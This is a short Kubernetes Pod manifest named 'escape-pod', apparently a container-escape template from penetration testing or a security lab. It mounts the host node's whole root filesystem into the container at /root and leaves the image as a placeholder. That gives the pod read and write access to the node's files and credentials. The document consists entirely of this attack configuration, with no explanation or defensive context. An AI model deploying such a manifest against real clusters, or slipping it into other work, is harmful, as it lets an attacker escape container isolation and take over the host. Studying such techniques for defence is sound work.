apiVersion: v1
kind: Pod
metadata:
  labels:
    run: escape-pod
  name: escape-pod
  namespace: default
spec:
  volumes:
  - name: host-fs
    hostPath:
      path: /
  containers:
  - image: <image_name>
    imagePullPolicy: IfNotPresent
    name: escape-pod
    volumeMounts:
      - name: host-fs
        mountPath: /root
  restartPolicy: Never 